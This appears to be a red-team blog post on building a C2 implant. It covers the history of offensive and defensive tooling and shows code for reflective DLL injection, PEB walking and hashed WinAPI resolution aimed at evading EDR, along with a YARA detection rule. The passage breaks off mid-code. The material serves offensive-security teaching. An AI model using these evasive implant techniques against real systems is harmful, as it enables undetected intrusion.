
Maelstrom #4: Writing a C2 Implant

In this blog, we will discuss how to write a C2 implant for the modern era. We will look at the history of offensive techniques and the progress of defence.

Introduction

In the series so far, we have discussed the purpose and intentions behind a C2, and the design considerations for both the implant and server.
In this post, we will move beyond this theoretical discussion and begin building a basic implant. We'll start by looking at the evolution of offensive and defensive techniques since 2010, to give us context and understanding of the current landscape. We'll then, as with our previous posts, discuss some important concepts that we'll be incorporating into the implant. Finally, we'll walk through the implant design, writing the base of both stage0 and stage1 of the implant for our exemplar C2, Maelstrom.
When discussing C2 implants, people often claim that their implant is fully undetectable (ironically, "FUD"). A newly written implant will evade signature-based detection simply because no signature exists for it yet, so on disk, and potentially even when run, it won't be flagged. However, this doesn't account for runtime detections, the telemetry generated by Windows, or the various reputation-scoring methods used by modern endpoint detection products.
In 2022, not all companies have implemented every protection available to them, such as a full SIEM with comprehensive event logging, or even an EDR agent on every device. This can give the impression that steps like those we will discuss in this post are unnecessary, but that impression simply comes from not yet having met an environment with anything more than Defender. The days of running commands via a command interpreter are long gone:
using System.Diagnostics;

public void ExecuteCommand(String command)
{
    Process p = new Process();
    ProcessStartInfo startInfo = new ProcessStartInfo();
    startInfo.FileName = "cmd.exe";
    startInfo.Arguments = @"/c " + command; // cmd.exe-specific implementation
    p.StartInfo = startInfo;
    p.Start();
}

Objectives

This post will cover:
  • The background and development of offensive and defensive techniques around implants.
  • The functions and code required for a contemporary Stage 0, including:
    • Environmental Keying
    • Detecting Suspicious Processes
    • Anti-Sandbox Protections
    • Anti-Debug Protections
  • The functions and code required for a contemporary Stage 1, including:
    • Reflective Loading
    • DLL Debugging
    • Server Checkins
    • Sleeping
By the end of this post, we will have an implant that can manage basic check-ins and that can be augmented with more sophisticated functionality, evasive techniques, and other OpSec features. We will explore these in later blogs, but for further information on evasive techniques, Check Point Research: Evasion techniques can be used as a reference.
As we've mentioned in a similar paragraph in every blog post so far, and will continue to mention in every post that follows, the code serves to illustrate the functionality but is far from being immediately usable within a functional C2.
Stage 0:
  • Environmental Keying
  • Detecting Suspicious Processes
  • Anti-Sandbox
  • Anti-Debug
Stage 1:
  • Checking-in to the server

Evolution of Offensive and Defensive Techniques

Over the years, code execution has become more and more complicated as defensive techniques and processes have improved, requiring more sophisticated approaches. In this section, we want to nail down the history and evolution of both offence and defence within this space. By doing so, we hope to build an understanding of why some behaviours are absolutely necessary in today's red team environment.
While some implants may be anti-virus proof, able to run without detection and execute commands on a system, this is a far cry from being able to operate as a viable C2 within a network with an up-to-date EDR and a correctly configured SIEM. Indeed, without these capabilities, a red team is unlikely to provide value to such an organisation, as many of its recommendations will simply be inapplicable to a network with that level of maturity.

2010s

Back in the day, when Metasploit was king, it was possible to get away with running commands from the shell. That is, the implant.exe running on the host would call cmd.exe, with the command wrapped in the /c flag. This would produce the following process tree:
-> implant.exe
   -> cmd.exe
      -> whoami.exe
This is all fine when there are no runtime rules triggering on specific behaviour. Also around this time, we had one-shot-kill exploits such as MS08-067, which essentially worked as a point-and-click exploit giving NT AUTHORITY\SYSTEM access.
Obviously we cannot speak for every anti-virus vendor, but around this time almost all detections were based on static analysis and required malware families to be known. This is still partially the case today with static detection; however, there is now a lot of crowdsourcing through services such as VirusTotal, and the adoption of machine learning, as seen in Intercept X: Powered by Deep Learning.

2014 - 2016

From the cmd.exe phase, the community moved to a very PowerShell-oriented style. This spawned projects like Empire in 2016, which was the first Command and Control (C2) framework written entirely in PowerShell. Around the same time, the original PoshC2 was produced, and PowerShell was working well for attackers. Meanwhile, the Antimalware Scan Interface (AMSI) was picking up; according to This is how attackers bypass Microsoft's AMSI anti-malware scanning protection, it appears to have been released in 2015. At the time, and still somewhat to this day, AMSI has been trivial to bypass. Because of this, websites such as amsi.fail were created to generate obfuscated AMSI bypasses from the following sources:
Also around 2016, Invoke-Obfuscation was produced to heavily obfuscate PowerShell. Later in 2016, Raphael Mudge wrote Modern Defenses and YOU!, a blog post detailing why operators should move away from PowerShell due to its popularity. This was reinforced by Microsoft in 2017 when they released Defending Against PowerShell Attacks, and then by a tweet from Matt Graeber alluding to PowerShell being too popular and .NET being the new technique.
While all this was going on, nearly every offensive PowerShell capability an operator needed was built into one suite: PowerSploit.
Cobalt Strike 3.11 (The snake that eats its tail) introduced execute-assembly, which would dictate the next few years...
Around this time, on the defensive side of the industry, anti-virus vendors were moving into the detection and mitigation of zero-day exploits due to an increase in their use by APTs, a portion of which were attributed to Chinese military groups.
Over this period, we saw the rise of companies such as CrowdStrike, SentinelOne, Cylance and a few others. We do not know the internals of these companies, or how, when, and why they started implementing their in-memory and technique-based detections. However, this period is likely when techniques such as userland hooking and registering kernel callbacks to detect suspicious behaviour took hold, followed by the introduction of languages such as Lua to write rules that parse the logs generated by such protections. Using Lua in this way is a known use case of Microsoft Defender for Endpoint (MDE), and these rules have been extracted by researchers, as seen in ExtractedDefender.

2017 - 2019

When Cobalt Strike introduced execute-assembly, the use of .NET exploded, and it is still somewhat popular today. Projects like SharpCollection were created to build nightly releases of many tools, but this barely scratches the surface of the attack tools available across the internet. Around this time, Covenant became the first C2 to popularize .NET as a C2 framework.
Likely due to this popularity, Microsoft added AMSI support to the .NET Framework. From What's new in .NET Framework 4.8:
Antimalware scanning for all assemblies. In previous versions of .NET Framework, the runtime scans all assemblies loaded from disk using either Windows Defender or third-party antimalware software. However, assemblies loaded from other sources, such as by the Assembly.Load(Byte[]) method, are not scanned and can potentially contain undetected malware. Starting with .NET Framework 4.8 running on Windows 10, the runtime triggers a scan by antimalware solutions that implement the Antimalware Scan Interface (AMSI).
At the time, this received some praise online. However, it was trivial to handle by heavily obfuscating the assembly, or by creating .NET loaders that encrypt the malicious tool and reflectively load it with Assembly.Load. Dom Chell gave a great talk on this in 2020: Dominic Chell - Offensive Development: Post Exploitation Tradecraft in an EDR World.
Similarly to PowerShell, SharpSploit was produced solving a huge portion of offensive requirements. An argument can be made that when a full attack suite for a given language is developed, it could be the end of an era for that language.
It was around 2019/2020 that the community began experimenting with languages such as Nim and the Dynamic Language Runtime (DLR), with projects such as SILENTTRINITY and OffensiveDLR.

2019 - 2020

Like execute-assembly, Cobalt Strike somewhat changed the typical tooling approach by introducing inline-execute in Cobalt Strike 4.0 – Bring Your Own Weaponization:
Finally, Cobalt Strike 4.0 introduces an internal inline-execute post-exploitation pattern. Inline-execute passes a capability to Beacon as needed, executes it inline, and cleans up the capability after it ran. This post-exploitation interface paves the way for future features that execute within Beacon’s process context without bloating the agent itself.
Along with inline-execute, Cobalt Strike introduced the idea of Beacon Object Files:
A Beacon Object File (BOF) is a compiled C program, written to a convention that allows it to execute within a Beacon process and use internal Beacon APIs. BOFs are a way to rapidly extend the Beacon agent with new post-exploitation features.
Essentially, they are just specifically crafted Common Object File Format (COFF) files. The benefit, as TrustedSec point out in A Developer's Introduction To Beacon Object Files, is that the operator can run code inside the Beacon process itself, avoiding the creation of a child process, which the built-in execute-assembly suffers from.
TrustedSec then went on to produce:
Around the same time, people began reimplementing execute-assembly by loading the CLR from within a reflective DLL (RDLL):
With this heavy investment in rewriting key parts of Cobalt Strike, the stream of new C2s became a torrent. While custom C2 development had always been a part of the industry, Cobalt Strike's off-the-shelf nature and market dominance seemed to eclipse much of this activity. However, from 2019 onwards, more and more courses and blogs endorsed the concept of custom C2 authorship as a viable alternative to a commercial C2, or even as a straightforward learning exercise.

2022

Cobalt Strike for many years, in our experience at any rate, was the C2. Even with the growth of other C2s, Cobalt Strike remains the C2 that other C2s are compared to, the Sennheiser HD600s of offensive tools. Cobalt Strike's interface and operation (and Armitage before it) remain "what a C2 looks like", at least in our minds, although we've not seen many imitate the device canvas (or, sadly, the lightning).
While there are arguments to be made for other projects, Cobalt Strike has been steering the industry, for both Offence and Defence, for years. The frequent and information dense blogs and videos helped both offensive and defensive teams improve their techniques in a way that few other vendors have done.
Raphael Mudge's video playlists:
Then the entire blog: Cobalt Strike: Blog
Researchers worked on "How to improve X in Cobalt Strike" for a long time, and the shift to building new and unique tooling has only happened over the past few years. For defensive teams, Cobalt Strike is still frequently seen and will be for a while, owing to its leaks and cracks over the years and its continued effectiveness.
Since Raphael Mudge stepped down from the team, HelpSystems has primarily focused on stability, which has given detection a lot of time to catch up. As a result, detection rates for Cobalt Strike, both on disk and in memory, have drastically increased. Cobalt Strike remains a completely viable and good option for a C2, but the industry has started to see some titans emerge to rival it.
In response, in recent posts Cobalt Strike has begun to discuss working on more evasive features, such as: Arsenal Kit Update: Thread Stack Spoofing. The Cobalt Strike Roadmap Update discusses this further, mapping their future progression.
As Raphael Mudge took his foot off the gas and research efforts slowed down, the industry began building its own tooling to reduce the number of signatures it would have to deal with. As more and more people built these tools, the C2 Matrix was started to track them. However, there are two titans at the forefront of advanced functionality:
Both of these offer advanced evasive technology baked into the product, and are aimed at working in sophisticated environments with high levels of protection in place.
Writing an entirely new C2 from scratch gives the operators full control of the implant and its communications. For example, as memory sweeps become more common, it may be necessary to fluctuate the page permissions of the memory region the implant is operating from. If the operator is using Cobalt Strike, then something like ShellcodeFluctuation could be used. The issue here is that it's an extra piece of shellcode to execute, and it places a hook on the KERNEL32!Sleep function, increasing the indicators of compromise. If, instead, the C2's code were fully under the operators' control, this could simply be a setting enabled or disabled on a per-implant basis.
When it comes to modern-day defences, it's a continuation of what we've just discussed. However, these techniques have gone through an endless amount of research and development to make them more effective. We've also seen the introduction of a Threat Intelligence feed into Event Tracing for Windows (ETW), known as ETWTi; more on this in Introduction to Threat Intelligence ETW. As well as ETWTi, more generic ETW feeds have seen use, for example the DotNet Runtime traces, which reveal which assemblies are being loaded.
In the next two blogs, we will look at implementing a few of these techniques. Namely, ETWTi, Userland hooks, ETW, AMSI and memory sweeps.

Important Concepts

In this section, we want to outline a few topics that will come up when building out the implant so that they make sense and we can demonstrate the implant effectively.

OS Shell Commands

When discussing OS shell commands, we don't just mean cmd.exe. We mean anything that causes a child process to spawn in order to run the command; every language has its equivalent. To name a few:
We've mentioned it a few times now, but let's look at why running post-exploitation under cmd.exe is a bad idea. In a more traditional environment, running commands directly on a host may be considered normal behaviour for an operator. However, as we've explored, the level of detection and awareness an operator can expect within a contemporary environment is far higher. Advances in logging (especially within Windows), greater awareness of which events to pay attention to, and EDR and intermediary security devices have resulted in a state of play where directly running commands is, in the worst case, immediately treated as an indicator of compromise and, in the best case, as highly suspicious activity. This is reflected in the fact that it has its own MITRE ATT&CK entry: Command and Scripting Interpreter (T1059).
While LOLBINs and aliases still have a role to play, using them for downloads and command execution is an exercise in operational security by obscurity: techniques relying on increasingly obscure Windows built-ins can be quickly neutralised with a simple blocklist. A more robust approach is to reimplement the logic within the implant, or to find the base functions that the commands themselves use and call them directly, bypassing cmd.exe entirely.
Fundamentally, Windows cannot block the features that Windows itself needs to use. Because these calls are so ubiquitous (every feature in Windows relies on them), defenders must instead rely on EDR hooks and callbacks to spot their misuse.
Overall, there are more ways to reimplement and refactor code with the WinAPI than there will be to execute commands via OS-based command execution or random LOLBINs. This is something that Cobalt Strike documented: OPSEC Considerations for Beacon Commands.

WinAPI

The WinAPI is the set of functions exported from various DLLs, most of which can be found in C:\Windows\System32, and it gives access to all the different components of Windows. Its scope is far too broad to cover here, but here is an example. Within Kernel32.dll there's a function called VirtualAlloc:
LPVOID VirtualAlloc(
    [in, optional] LPVOID lpAddress,
    [in]           SIZE_T dwSize,
    [in]           DWORD  flAllocationType,
    [in]           DWORD  flProtect
);
For the most part, these APIs are documented on MSDN. As these functions are written by Microsoft and are proprietary, projects such as ReactOS attempt to recreate them. So, when we discuss userland hooks and related topics in future blogs, we will also discuss how and why reimplementing a function, rather than calling it, will typically avoid specific detections.
For now, though, the WinAPI gives us access to calls that will make this entire process easier.

Process Environment Block

Windows is an object-oriented operating system, meaning that most of the resources it manages are represented as objects, each with some form of data structure, and processes fall into this category. A process, like calc.exe, has a structure called the Process Environment Block (PEB) which contains all sorts of information:
  • Process Name
  • Location
  • Is it being debugged
  • Loaded modules
  • Environment Path
  • Etc
This is all stored in a structure like so (the partially documented definition from winternl.h):
typedef struct _PEB {
    BYTE                          Reserved1[2];
    BYTE                          BeingDebugged;
    BYTE                          Reserved2[1];
    PVOID                         Reserved3[2];
    PPEB_LDR_DATA                 Ldr;
    PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
    PVOID                         Reserved4[3];
    PVOID                         AtlThunkSListPtr;
    PVOID                         Reserved5;
    ULONG                         Reserved6;
    PVOID                         Reserved7;
    ULONG                         Reserved8;
    ULONG                         AtlThunkSListPtr32;
    PVOID                         Reserved9[45];
    BYTE                          Reserved10[96];
    PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
    BYTE                          Reserved11[128];
    PVOID                         Reserved12[1];
    ULONG                         SessionId;
} PEB, *PPEB;
Throughout this blog, we will interact with the PEB a lot, mainly to enumerate loaded modules. As this is a fairly extensive topic, we won't discuss it all here, and instead point to some recommended reading. For now, think of the PEB as the structure on which the process is built.

Position Independent Code

When we talk about Position Independent Code (PIC), we mean C code written in a very specific way, with additional restrictions. The goal is to have all the code we plan to execute inside the .text section of the PE.
Writing C normally will cause different parts of the code to be stored in different sections:
  • Global variables in .data (initialised) or .bss (uninitialised)
  • Imported DLLs in .idata
  • Exports in .edata
  • String literals (CHAR* and WCHAR*) in .rdata
Even with these restrictions, we can still achieve our goal: we just need to write code in a way that avoids these other section allocations, ensuring everything lives in the .text section. We need this because .text is the only section we will extract from the compiled binary; if any part of the code relies on data in .bss, for example, it will crash, because that section won't be there.
For example, let's take this string:
const char* String = "hello world";
Because this is read-only initialised data, it goes into .rdata. To make it PIC, we write it as a character array instead:
char String[] = {'h', 'e', 'l', 'l', 'o', ' ', 'w', 'o', 'r', 'l', 'd', 0};
What if we want to use VirtualAlloc? If it's called directly, Kernel32 will appear as an import. To get around this, we need to dynamically load the DLL and then resolve the function's address (more on this later).
One final note: to ensure the C runtime (CRT) isn't controlling the execution flow of the PE, we need to make sure the entry point is not main or any other CRT entry point such as WinMain or wmain. We will show this later on in the Makefile.

Supporting Post Exploitation

When discussing implants, there are several methods of supporting post-exploitation utilities. For the most part, implants have the majority of their functionality embedded, so when the implant receives a command, it goes through some sort of switch statement:
switch (job) {
case 1:
    whoami();
    break;
case 2:
    hostname();
    break;
}
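The switch above is the simplest form of embedded dispatch. As the command set grows, a table pairing job IDs with handlers keeps each command in one place. The sketch below assumes hypothetical job IDs, handler names, and placeholder results; it is illustrative only, not Maelstrom's actual dispatcher.

```c
#include <stddef.h>

/* Hypothetical job IDs; the real values would be agreed with the server. */
enum JobId { JOB_WHOAMI = 1, JOB_HOSTNAME = 2 };

/* Each handler returns a result string for the server (placeholders here). */
typedef const char *(*JobHandler)(void);

static const char *HandleWhoami(void)   { return "whoami: placeholder"; }
static const char *HandleHostname(void) { return "hostname: placeholder"; }

/* Table mapping job IDs to handlers; adding a command means adding a row. */
typedef struct {
    int id;
    JobHandler handler;
} JobEntry;

static const JobEntry kJobs[] = {
    { JOB_WHOAMI,   HandleWhoami },
    { JOB_HOSTNAME, HandleHostname },
};

/* Looks up the job ID and runs its handler; returns NULL for unknown IDs. */
static const char *DispatchJob(int id)
{
    for (size_t i = 0; i < sizeof(kJobs) / sizeof(kJobs[0]); i++) {
        if (kJobs[i].id == id) {
            return kJobs[i].handler();
        }
    }
    return NULL;
}
```

Behaviourally this matches the switch. Note that the const table will be placed in .rdata, which is fine for a DLL-based Stage 1 but would break the .text-only rule for PIC code.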
Alternatively, the implant could act as a loader, supporting:
This keeps the actual implant significantly smaller and makes all functionality modular. However, it comes at the cost of constant memory allocations for each job. The right method depends entirely on the use case, and both approaches have trade-offs worth keeping in mind. For us, we will stick with the traditional variant, with all functionality embedded.

Types of implants

If the implant is written in .NET, then a simple, dynamically loaded assembly is fine. However, this is not the type of implant we are discussing. For an implant written in C or C++, there are several options for the type of implant to use.
Position Independent
The implant could be position independent, with its entry point called directly. This is seen in SleepyCrypt, where the shellcode is copied into memory allocated with VirtualAlloc and cast to a function pointer, like so:
// Copy the shellcode into it.
memcpy( pBuffer, shellcode_bin, shellcode_bin_len );
// Make a function pointer to the run function shellcode.
fprun Run = ( fprun )pBuffer;
Dynamic Link Library
More commonly, the implant could be written as a Dynamic Link Library (DLL). DLLs are typically loaded with LoadLibraryA:
HMODULE hModule = LoadLibraryA("c:\\implant.dll");
The issue here is that LoadLibraryA requires the DLL to be on disk, which breaks the golden rule of OpSec: don't write to disk. Doing so leaves artifacts behind, allowing the implant to be signatured and resulting in more time spent trying to break the signature.
The Golden Rule of OpSec: Don't write to disk!*
* Unless you need to, or unless you know how to avoid the detection, or... except... and... ... other caveats
Reflective DLLs
This led to a technique known as Reflective DLLs (RDLLs), first produced by Stephen Fewer around 11 years ago. The ReflectiveDLLInjection repository contains the original code. The technique has been updated since, but let's discuss the original. Its description:
Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.
Essentially, the RDLL will be allocated similarly to typical shellcode:
However, before the thread is created, the offset of the RDLL's exported loader function must be calculated. This is done by parsing the DLL's own PE headers within the buffer to locate the Export Directory, walking its exports to find the ReflectiveLoader export (which is simply a function exposed from the DLL), and converting that export's Relative Virtual Address (RVA) into an offset within the raw file.
See also: The .edata Section.
Once the exported address has been found, the offset is added to the base address of the allocated space for the RDLL. Like so:
LPVOID lpBuffer = NULL; /* This will be the buffer containing the raw RDLL file */
DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
LPVOID lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
/* In the original LoadRemoteLibraryR, lpBuffer is copied into lpRemoteLibraryBuffer with WriteProcessMemory at this point */
LPTHREAD_START_ROUTINE lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
  • First off, lpBuffer can come from anywhere: downloaded from the internet, read from a file, etc. For an implant, it's likely downloaded over some sort of channel (HTTP).
  • The buffer is then parsed to find the offset of the exported function.
  • With the offset determined and stored in dwReflectiveLoaderOffset, lpRemoteLibraryBuffer holds the base address returned from VirtualAllocEx.
  • With the space allocated and the export offset found, adding the two together gives the address of the exported function.
All that needs to happen now is for the thread to be created at this point to execute the loader:
hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
All of this can be seen in LoadRemoteLibraryR from the repository.
The exported function is ReflectiveLoader, marked with DLLEXPORT; this is the function the new thread starts executing. The code is well documented, so we will not walk through the codebase.
There are some issues with RDLLs, which we will discuss in a future post where we perform static and runtime analysis of the implant. For defenders, make sure there is a signature for this technique, and ensure the ReflectiveLoader string is treated as malicious, as seen on alienvault.com:
import "pe"

rule ReflectiveLoader
{
    meta:
        description = "Detects a unspecified hack tool, crack or malware using a reflective loader no hard match further investigation recommended"
        reference = "Internal Research"
        score = 60
    strings:
        $s1 = "ReflectiveLoader" fullword ascii
        $s2 = "ReflectivLoader.dll" fullword ascii
        $s3 = "?ReflectiveLoader@@" ascii
    condition:
        uint16(0) == 0x5a4d and ( 1 of them or pe.exports("ReflectiveLoader") or pe.exports("_ReflectiveLoader@4") or pe.exports("?ReflectiveLoader@@YGKPAX@Z") )
}
This is the technique we will follow for Maelstrom.

Recap of the Execution Flow

During Maelstrom: The C2 Architecture we discussed the execution flow that the implant will take:
  • Stage 0: A Position Independent Loader
  • Stage 1: Reflective DLL
By making the stage 0 loader PIC, we can wrap it into any other form of loader required. Once the Stage 0 executes, it will load a Reflective DLL which will be the main implant (Stage 1).
Simple.

Stage 0

Maelstrom WinAPI Resolution

Before getting into the stager, we need to cover how Maelstrom resolves WinAPI functions. To keep our actual C2's functionality somewhat guarded, we're opting to use publicly accessible code throughout this series. One solution is paranoidninja/PIC-Get-Privileges/blob/main/addresshunter.h, and an alternative is Speedi13/Custom-GetProcAddress-and-GetModuleHandle-and-more/blob/master/CustomWinApi.cpp#L168.
Parsing the PEB is not a difficult task, and examples are all over the internet; CAPA even has rules to detect it. The function from Paranoid Ninja's example:
FARPROC GetSymbolAddress(HANDLE hModule, LPCSTR lpProcName) {
    UINT64 uiModuleAddress = (UINT64)hModule;
    UINT64 uiSymbolAddress = 0;
    UINT64 uiExportedAddressTable = 0;
    UINT64 uiNamePointerTable = 0;
    UINT64 uiOrdinalTable = 0;

    if (hModule == NULL) {
        return 0;
    }

    // Locate the export directory: DOS header -> NT headers -> data directory
    PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
    PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);

    uiExportedAddressTable = (uiModuleAddress + ExportDir->AddressOfFunctions);
    uiNamePointerTable = (uiModuleAddress + ExportDir->AddressOfNames);
    uiOrdinalTable = (uiModuleAddress + ExportDir->AddressOfNameOrdinals);

    // Values below 0x10000 are ordinals, not name pointers (the IS_INTRESOURCE rule).
    // Testing every upper bit avoids misreading a 64-bit name pointer as an ordinal.
    if (((UINT64)lpProcName >> 16) == 0) {
        uiExportedAddressTable += ((IMAGE_ORDINAL((UINT64)lpProcName) - ExportDir->Base) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
    }
    else {
        // Walk the parallel name/ordinal tables until the requested name is found
        DWORD dwCounter = ExportDir->NumberOfNames;
        while (dwCounter--) {
            char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
            if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
                uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
                uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
                break;
            }
            uiNamePointerTable += sizeof(DWORD);
            uiOrdinalTable += sizeof(WORD);
        }
    }
    // Note: forwarded exports are not handled; their RVA points back into the export directory
    return (FARPROC)uiSymbolAddress;
}
First, the module base address is passed in and cast to uiModuleAddress:
UINT64 uiModuleAddress = (UINT64)hModule;
This is then used to identify the Export Directory; again, this is a standard technique:
PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);
The NT headers are located by adding the DOS header's e_lfanew field to the module base address. From the NT headers' optional header, the export entry of the Data Directory array is taken. Finally, the Export Directory itself is found by adding that entry's VirtualAddress (an RVA) to the module base. Now access to the Export Directory has been achieved.
Now it is just a case of looping through all the exported functions from that directory until the strings match:
DWORD dwCounter = ExportDir->NumberOfNames;
while (dwCounter--) {
    char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
    if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
        uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
        break;
    }
    uiNamePointerTable += sizeof(DWORD);
    uiOrdinalTable += sizeof(WORD);
}
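The loop relies on AddressOfNames and AddressOfNameOrdinals being parallel arrays: the position of a matching name selects an entry in the ordinal table, and that value indexes AddressOfFunctions. The portable model below makes that indirection concrete. It is a sketch with hypothetical names (ExportModel, LookupExport, StrEq); in a real PE the tables hold RVAs that must be added to the module base, as GetSymbolAddress does with DEREF_32.

```c
#include <stdint.h>

/* Hypothetical in-memory model of an export directory's three tables.
   In a real PE these hold RVAs relative to the module base, not pointers. */
typedef struct {
    const char *const *Names;     /* like AddressOfNames: one entry per named export */
    const uint16_t *NameOrdinals; /* like AddressOfNameOrdinals: parallel to Names */
    const uint32_t *Functions;    /* like AddressOfFunctions: indexed by NameOrdinals[i] */
    uint32_t NumberOfNames;
} ExportModel;

/* Byte-wise string equality, so no CRT strcmp is needed. */
static int StrEq(const char *a, const char *b)
{
    while (*a != '\0' && *a == *b) {
        a++;
        b++;
    }
    return *a == *b;
}

/* name -> position i -> NameOrdinals[i] -> Functions[...]; returns 0 if absent. */
static uint32_t LookupExport(const ExportModel *exp, const char *name)
{
    for (uint32_t i = 0; i < exp->NumberOfNames; i++) {
        if (StrEq(exp->Names[i], name)) {
            uint16_t index = exp->NameOrdinals[i]; /* name position -> function index */
            return exp->Functions[index];          /* function index -> "RVA" */
        }
    }
    return 0;
}
```

For example, with names {"Alpha", "Beta"}, ordinals {1, 0} and functions {0x1000, 0x2000}, "Alpha" resolves to 0x2000. The order of names need not match the order of functions, which is exactly why the ordinal table exists.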
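As strcmp cannot be used without resolving it first, it's easier to just implement it ourselves, along with a memset replacement. Note that GetSymbolAddress calls it as Strcmp, so the names must match in a real build: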
int STRCMP(const char* p1, const char* p2)
{
    const unsigned char* s1 = (const unsigned char*)p1;
    const unsigned char* s2 = (const unsigned char*)p2;
    unsigned char c1, c2;
    do
    {
        c1 = (unsigned char)*s1++;
        c2 = (unsigned char)*s2++;
        if (c1 == '\0')
            return c1 - c2;
    } while (c1 == c2);
    return c1 - c2;
}

void* MEMSET2(void* dest, int val, size_t len)
{
    unsigned char* ptr = (unsigned char*)dest;
    while (len-- > 0)
        *ptr++ = (unsigned char)val;
    return dest;
}
When STRCMP matches, uiSymbolAddress is set, the loop breaks, and the address is returned:
return (FARPROC)uiSymbolAddress;
So where does the module base address come from? For Kernel32, it comes from GetKernel32:
LPVOID GetKernel32() {
    LPVOID pKernel32Dll = NULL;
    pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH1);
    if (NULL == pKernel32Dll) {
        pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH2);
        if (NULL == pKernel32Dll) {
            pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH3);
            if (NULL == pKernel32Dll) {
                return NULL;
            }
        }
    }
    return pKernel32Dll;
}
Three DJB2 hashes are defined, one per casing of the module name:
#define KERNEL32DLL_HASH1 0xa709e74f /// Hash of KERNEL32.DLL
#define KERNEL32DLL_HASH2 0xa96f406f /// Hash of kernel32.dll
#define KERNEL32DLL_HASH3 0x8b03944f /// Hash of Kernel32.dll
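GetModuleByHash calls Djb2HashW, which isn't shown in the post. The sketch below assumes the classic DJB2 (seed 5381, hash * 33 + c, 32-bit wraparound) applied to each wide character. The series' own Djb2HashW may differ in seed or character handling, and we have not checked that this version reproduces the exact constants above.

```c
#include <stddef.h>

/* Classic DJB2 over a NUL-terminated wide string (assumed variant). */
static unsigned int Djb2HashW(const wchar_t *str)
{
    unsigned int hash = 5381;
    wchar_t c;
    while ((c = *str++) != L'\0') {
        /* (hash << 5) + hash == hash * 33; unsigned arithmetic wraps mod 2^32 */
        hash = ((hash << 5) + hash) + (unsigned int)c;
    }
    return hash;
}
```

Because DJB2 is case-sensitive, "KERNEL32.DLL" and "kernel32.dll" hash differently, which is why three constants are needed. Lowercasing each character before mixing it in would let a single constant cover every casing.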
Then, by parsing the PEB, we can obtain the DllBase:
LPVOID GetModuleByHash(UINT uiModuleHash) {
    PEB* peb = (PEB*)PPEB_PTR;
    if (NULL == peb) {
        return NULL;
    }
    PEB_LDR_DATA* pLdr = peb->Ldr;
    LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
    LIST_ENTRY* pListEntry = NULL;
    LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;
    for (pListEntry = pListHead->Flink; pListEntry != pListHead; pListEntry = pListEntry->Flink) {
        pLdrEntry = (LDR_DATA_TABLE_ENTRY_COMPLETED*)((PCHAR)pListEntry - sizeof(LIST_ENTRY));
        WCHAR* pwDllName = pLdrEntry->BaseDllName.Buffer;
        UINT wHash = Djb2HashW(pwDllName);
        if (wHash == uiModuleHash) {
            return pLdrEntry->DllBase;
        }
    }
    return NULL;
}
First, get a pointer to the PEB:
PEB* peb = (PEB*)PPEB_PTR;
Where PPEB_PTR is:
#define PPEB_PTR __readgsqword(0x60)
On x64 Windows, the GS segment points to the TEB, and the qword at offset 0x60 holds the address of the PEB. Next, the PEB_LDR_DATA structure is reached through the PEB's Ldr member:
PEB_LDR_DATA* pLdr = peb->Ldr;
Then get access to the module list:
LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
LIST_ENTRY* pListEntry = NULL;
LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;
InMemoryOrderModuleList is a member of PEB_LDR_DATA, as seen in the struct:
typedef struct _PEB_LDR_DATA {
BYTE Reserved1[8];
PVOID Reserved2[3];
LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
Then walk the list, hashing each entry's BaseDllName until a hash matches. That entry's DllBase is the base address of the DLL we want.
Next, each resolved address is cast to the right function type. Before that, here is how the APIs are stored:
typedef struct API_ {
LPVOID LoadLibraryA;
LPVOID CloseHandle;
LPVOID GlobalMemoryStatusEx;
LPVOID CreateToolhelp32Snapshot;
LPVOID Process32NextW;
LPVOID Process32FirstW;
LPVOID GetComputerNameW;
